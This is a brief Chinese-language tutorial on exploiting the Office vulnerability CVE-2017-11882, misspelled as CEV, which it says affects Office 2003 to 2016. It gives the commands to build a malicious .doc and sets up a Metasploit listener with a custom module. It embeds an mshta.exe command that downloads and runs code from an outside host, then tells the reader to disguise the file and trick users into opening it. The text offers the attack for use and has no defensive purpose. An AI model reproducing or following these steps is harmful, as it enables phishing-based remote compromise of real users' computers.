1)漏洞介绍
通杀Office 2003到2016的所有版本
GitHub下载cev脚本,生成doc文档
命令:python command_CEV-2017-11882.py -c "cmd.exe /c calc.exe" -o text.doc
2)ps_shell.rb与msf形成监听
首先将rb文件放入msf目录的攻击模块(expoit)下建立目录(ajest)并将rb模块导入
use调用该模块,并修改options参数(IP,端口,uri)
run
生成命令(例:mshta.exe "http://192.168.71.120/a")
随后将命令写入到doc中
命令:python command_CEV-2017-11882.py -c "mshta.exe http://192.168.71.120/a" -o text.doc
将生成的doc利用社交工具伪装好骗取用户打开